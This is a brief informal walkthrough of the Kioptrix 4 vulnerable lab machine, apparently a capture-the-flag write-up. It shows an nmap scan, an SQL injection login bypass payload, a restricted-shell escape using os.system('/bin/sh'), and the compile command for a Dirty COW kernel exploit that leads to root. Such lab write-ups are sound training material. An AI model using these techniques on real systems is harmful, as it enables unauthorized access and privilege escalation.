We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Tue Apr 6 05:36:59 2021 as: nmap -sC -sV -oA nmap 172.16.139.136 Nmap scan report for 172.16.139.136 Host is up (0.00043s latency). Not shown: 566 closed ports, 430 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA) |_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h59m58s, deviation: 2h49m42s, median: -1s |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.28a) | Computer name: Kioptrix4 | NetBIOS computer name: | Domain name: localdomain | FQDN: Kioptrix4.localdomain |_ System time: 2021-04-06T05:37:14-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Apr 6 05:37:30 2021 -- 1 IP address (1 host up) scanned in 30.35 seconds
4 open ports let check out the port 80 first hmmm a simple login page let burst some directory.
Some user names i guess going back to the login page to test for sqli.
Yea it vulnerable now let try it with the username we got from the directory with the username
john and password ` ‘ OR ‘1’=’1’– -` .
Cool some credentials let try using it on SSH.
Boom we are in but the shell is kind of strange let find a way to bypass the
/bin/kshell because we keep getting kick out of the SSH.
echo os.system('/bin/sh') and we bypass it.
Boom and it running a old version of linux yea it dirtycow let confirm it.
So we download the exploit and get it on the attack machine now let complie and run it.
gcc -pthread dirty.c -o dirty -lcrypt
Boom now let run it after doing that let log in ssh with the new credentials we just got or we can easily just use the
su firefart and the password we created with it.
And boom we are root.
Greeting From Muzec